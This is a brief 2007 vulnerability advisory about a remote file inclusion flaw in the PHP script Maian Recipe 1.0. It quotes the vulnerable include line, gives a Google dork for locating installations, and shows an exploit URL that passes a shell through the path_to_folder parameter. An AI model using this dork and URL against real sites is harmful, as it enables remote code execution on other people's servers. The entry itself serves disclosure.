Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability

2007-02-08T00:00:00
ID SECURITYVULNS:DOC:16006
Type securityvulns
Reporter Securityvulns
Modified 2007-02-08T00:00:00

Description


Found by Denven *




Script: http://www.maianscriptworld.co.uk/freestuff_1975_recipe.html


Google Dork: "Powered by Maian Recipe v1.0"


ERROR: classes/class_mail.inc.php :

include($path_to_folder.'classes/class.phpmailer.php');



RFI:

http://www.SITE.com/path/classes/class_mail.inc.php?path_to_folder=[shell]



denven[at]gmail[dot]com